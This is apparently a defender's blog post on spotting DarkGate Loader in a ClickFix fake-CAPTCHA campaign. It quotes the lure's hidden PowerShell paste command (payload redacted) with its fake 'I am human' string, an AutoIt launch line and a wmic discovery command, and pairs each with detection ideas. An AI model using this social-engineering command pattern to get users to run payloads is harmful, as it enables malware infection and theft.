032. DarkGate Delivery via ClickFix Attack: Detection and Hunting Opportunities

Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common, I'm not sure about ClickFix, but DarkGate is used by adversaries even is CIS.

Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs. The chain starts from a malicious Google ad. If the victim clicks it, he or she sees a fake “Verify you are human” page. After checking the box, the victim sees the instructions on how to launch the Run dialog and paste a malcious PowerShell script:

cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092"

As you can see, the threat actors added an interesting string to make the "verification" look more legitimate. You definitely can use it for detection! If we decode Base64, we can see very common cmdlets used by adversaries for downloading and running malicious files: "Invoke-WebRequest" and "Start-Process". So, this is another detection opportunity!

To run DarkGate Loader, the threat actors usually use AutoIt, for example:

"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x

You can use this knowledge for detection and hunting:

  • Look for AutoIt interpreter and AutoIt scripts in uncommon locations
  • Look for renamed AutoIt executable - use metadata: "AutoIt v3 Script", "AutoIt3.exe", etc.
Another very common DarkGate behavior is abusing wmic for collecting domain information:

cmd.exe /c wmic ComputerSystem get domain

Yes, this is another great detection opportunity!

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!